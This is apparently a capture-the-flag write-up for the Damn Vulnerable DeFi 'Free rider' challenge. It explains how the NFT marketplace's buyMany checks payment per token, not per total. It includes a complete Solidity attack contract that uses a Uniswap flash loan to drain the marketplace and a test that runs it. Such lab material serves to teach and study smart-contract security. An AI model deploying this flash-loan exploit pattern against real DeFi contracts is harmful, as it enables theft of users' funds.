Defi Hacker Series: Damn Vulnerable DeFi (10) - Free rider

Damn Vulnerable DeFi is a series of challenges focused on DeFi smart contract attacks. The content includes flash loan attacks, lending pools, on-chain oracles, and more. Before you begin, you need to have skills related to Solidity and JavaScript. For each challenge, your task is to ensure that the unit tests for that challenge can pass.

Challenge link: https://www.damnvulnerabledefi.xyz/challenges/10.html

Challenge description:

There is an already deployed Damn Valuable NFT marketplace, which initially minted 6 NFTs and can sell them on the marketplace for 15 ETH each.

A buyer has told you a secret: the market is vulnerable, and all tokens can be taken away. However, he does not know how to do it. He is willing to offer a reward of 45 ETH to anyone who can withdraw the NFTs and send them to him.

You want to build some reputation with this buyer, so you have agreed to the plan.

Unfortunately, you only have 0.5 ETH. It would be great if there were a place where you could get ETH for free, even temporarily.

FreeRiderBuyer.sol#

Buyer contract

import "@openzeppelin/contracts/utils/Address.sol";
import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
import "@openzeppelin/contracts/token/ERC721/IERC721.sol";
import "@openzeppelin/contracts/token/ERC721/IERC721Receiver.sol";
contract FreeRiderBuyer is ReentrancyGuard, IERC721Receiver {

    using Address for address payable;
    address private immutable partner;
    IERC721 private immutable nft;
    uint256 private constant JOB_PAYOUT = 45 ether;
    uint256 private received;
    
    // 45 ETH was transferred to this contract upon deployment
    constructor(address _partner, address _nft) payable {
        require(msg.value == JOB_PAYOUT);
        partner = _partner;
        nft = IERC721(_nft);
        IERC721(_nft).setApprovalForAll(msg.sender, true);
    }
    
    // Function triggered when receiving an NFT
    function onERC721Received(
        address,
        address,
        uint256 _tokenId,
        bytes memory
    ) 
        external
        override
        nonReentrant
        returns (bytes4) 
    {
        require(msg.sender == address(nft));
        require(tx.origin == partner); // Ensure the transaction initiator is the partner
        require(_tokenId >= 0 && _tokenId <= 5);
        require(nft.ownerOf(_tokenId) == address(this)); // Ensure it is owned
        
        received++;
        // After receiving 6 NFTs, transfer 45 ETH to the partner
        if(received == 6) {            
            payable(partner).sendValue(JOB_PAYOUT);
        }            
        return IERC721Receiver.onERC721Received.selector;
    }
}

Since this contract inherits from IERC721Receiver, and the NFT contract inherits from ERC721

import "@openzeppelin/contracts/token/ERC721/ERC721.sol";
import "@openzeppelin/contracts/token/ERC721/extensions/ERC721Burnable.sol";
import "@openzeppelin/contracts/access/AccessControl.sol";

contract DamnValuableNFT is ERC721, ERC721Burnable, AccessControl {}

This means that when the NFT contract calls safeTransferFrom and the to address is this contract, it will trigger the onERC721Received function.

safeTransferFrom(address from, address to, uint256 tokenId, bytes memory data)

safeTransferFrom will internally check if to is a contract address, and if so, it will call onERC721Received.

FreeRiderNFTMarketplace.sol#

Trading contract, inheriting from ReentrancyGuard, to prevent reentrancy attacks.

The constructor creates a DamnValuableNFT contract and mints amountToMint number of NFTs to the contract deployer.

constructor(uint8 amountToMint) payable {
    require(amountToMint < 256, "Cannot mint that many tokens");
    token = new DamnValuableNFT();

    for(uint8 i = 0; i < amountToMint; i++) {
        token.safeMint(msg.sender);
    }        
}

This contract provides two functionalities:

Bulk selling offerMany

function offerMany(uint256[] calldata tokenIds, uint256[] calldata prices) external nonReentrant {
    require(tokenIds.length > 0 && tokenIds.length == prices.length);
    for (uint256 i = 0; i < tokenIds.length; i++) {
        _offerOne(tokenIds[i], prices[i]);
    }
}

function _offerOne(uint256 tokenId, uint256 price) private {
    // Ensure the price > 0
    require(price > 0, "Price must be greater than zero");
    // The seller must own the NFT
    require(msg.sender == token.ownerOf(tokenId), "Account offering must be the owner");
    
    // Ensure it is approved
    require(
        token.getApproved(tokenId) == address(this) ||
        token.isApprovedForAll(msg.sender, address(this)),
        "Account offering must have approved transfer"
    );
    // Record the price
    offers[tokenId] = price;

    amountOfOffers++;

    emit NFTOffered(msg.sender, tokenId, price);
}

The NFT holder calls this method, and besides some basic checks, it will also authorize this contract to operate on the NFTs held by the holder.

Finally, the offer price is saved to offers[tokenId], and when someone purchases, since the holder has authorized this contract to operate their NFTs, the contract can directly transfer the holder's NFT to the buyer upon receiving payment.

Bulk buying buyMany

function buyMany(uint256[] calldata tokenIds) external payable nonReentrant {
    for (uint256 i = 0; i < tokenIds.length; i++) {
        _buyOne(tokenIds[i]);
    }
}

function _buyOne(uint256 tokenId) private {
    // Get the price
    uint256 priceToPay = offers[tokenId];
    // Ensure the amount paid is not less than the sale price
    require(priceToPay > 0, "Token is not being offered");
    require(msg.value >= priceToPay, "Amount paid is not enough");

    amountOfOffers--;

    // Transfer the NFT to the buyer
    token.safeTransferFrom(token.ownerOf(tokenId), msg.sender, tokenId);

    // Transfer the received ETH to the seller
    payable(token.ownerOf(tokenId)).sendValue(priceToPay);

    emit NFTBought(msg.sender, tokenId, priceToPay);
}

When a seller sells their held NFT in the trading contract, the buyer can execute the purchase process, first obtaining the price and ensuring the received ETH is not less than the sale price. Then, the contract transfers the seller's NFT to the buyer and sends the received ETH to the seller.

The bulk buying function has a clear issue: when checking that the received ETH is not less than the sale price, require(msg.value >= priceToPay, "Amount paid is not enough"); checks the price of a single NFT, not the total amount for the bulk purchase. Moreover, the ETH sent to the seller uses the contract's balance.

For example, if the trading contract holds 100 ETH, and the seller sells their tokenId NFTs 1, 2, and 3 for prices of 1 ETH, 5 ETH, and 3 ETH, respectively. The buyer calling buyMany should pay 9 ETH, but actually only needs to pay 5 ETH (the highest price of the tokenId) to satisfy the require check. At this point, the trading contract holds a total of 105 ETH. When transferring, the trading contract transfers a total of 9 ETH to the sellers. Thus, the buyer's shortfall in ETH is covered by the trading contract's balance.

In this challenge, the unit price of the NFT is 15 ETH, so only 15 ETH is needed to purchase 6 NFTs, not 90 ETH. But you only have 0.5 ETH. Therefore, you need to find a way to obtain ETH, and using a flash loan from uniswap is a good method:

Borrow 15 WETH through a flash loan and convert WETH to ETH.
Use ETH to purchase NFTs, and send the purchased NFTs to FreeRiderBuyer, receiving a reward of 45 ETH.
Finally, convert ETH back to WETH, and repay the flash loan including the fees.

Since these operations need to be completed in a single transaction, you need to write an attack contract. However, before that, let's take a look at what the test file free-rider.challenge.js has initialized:

Sent 0.5 ETH to attacker.
Deployed contracts WETH, DVT, uniswapFactory, uniswapRouter.
Added liquidity by calling the addLiquidityETH method of the uniswapRouter contract, which internally creates a pair contract uniswapPair with the paired tokens being WETH-DVT, adding liquidity of 9000 WETH and 15000 DVT.
Deployed the FreeRiderNFTMarketplace contract and transferred 90 ETH.
Deployed the NFT contract.
Created sell orders in the trading contract for tokenId 0 to 5, each priced at 15 ETH.
Deployed the FreeRiderBuyer contract and transferred 45 ETH.

The attack contract code is as follows:

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

import "@openzeppelin/contracts/token/ERC721/IERC721Receiver.sol";
import "@uniswap/v2-core/contracts/interfaces/IUniswapV2Pair.sol";
import "@uniswap/v2-core/contracts/interfaces/IUniswapV2Callee.sol";
import "@uniswap/v2-periphery/contracts/interfaces/IWETH.sol";
import "../free-rider/FreeRiderNFTMarketplace.sol";
import "../free-rider/FreeRiderBuyer.sol";
import "../DamnValuableNFT.sol";

contract FreeRiderAttack is IUniswapV2Callee, IERC721Receiver {
  
  FreeRiderBuyer buyer;
  FreeRiderNFTMarketplace marketplace;

  IUniswapV2Pair pair;
  IWETH weth;
  DamnValuableNFT nft;
  address attacker;

  uint256[] tokenIds = [0, 1, 2, 3, 4, 5];

  constructor(address _buyer, address payable _marketplace, address _pair, address _weth, address _nft) payable {
    buyer = FreeRiderBuyer(_buyer);
    marketplace = FreeRiderNFTMarketplace(_marketplace);

    pair = IUniswapV2Pair(_pair);
    weth = IWETH(_weth);
    nft = DamnValuableNFT(_nft);

    attacker = msg.sender;
  }

  function attack(uint amount) external {
    // Pair contract: WETH-DVT
    // Borrow amount of WETH through uniswap flash loan
    // Note: The last parameter cannot be empty, otherwise the flash loan callback will not execute
    pair.swap(amount, 0, address(this), "x");
  }

  // Uniswap flash loan callback
  function uniswapV2Call(
    address sender,
    uint amount0,
    uint amount1,
    bytes calldata data
  ) external {
    // Convert the borrowed WETH to ETH
    weth.withdraw(amount0);

    // Transfer the borrowed 15 ETH to the trading contract to purchase NFTs with tokenId 0 to 5
    marketplace.buyMany{value: amount0}(tokenIds);

    // Transfer the purchased NFTs to the buyer and receive 45 ETH
    for (uint tokenId = 0; tokenId < tokenIds.length; tokenId++) {
      nft.safeTransferFrom(address(this), address(buyer), tokenId);
    }

    // Calculate the fees to repay the flash loan and convert the amount to WETH
    uint fee = amount0 * 3 / 997 + 1;
    weth.deposit{value: fee + amount0}();

    // Repay the flash loan
    weth.transfer(address(pair), fee + amount0);

    // Transfer the remaining ETH to the attacker
    payable(address(attacker)).transfer(address(this).balance);
  }

  receive() external payable {}

  function onERC721Received(address, address, uint256, bytes memory) external pure override returns (bytes4) {
      return IERC721Receiver.onERC721Received.selector;
  }
}

In the test file free-rider.challenge.js, add the execution entry:

it('Exploit', async function () {
  const freeRiderAttack = await (await ethers.getContractFactory('FreeRiderAttack', attacker)).deploy(
    this.buyerContract.address,
    this.marketplace.address,
    this.uniswapPair.address,
    this.weth.address,
    this.nft.address
  )
  await freeRiderAttack.attack(NFT_PRICE)
})

Finally, execute yarn free-rider and the test passes!

Complete code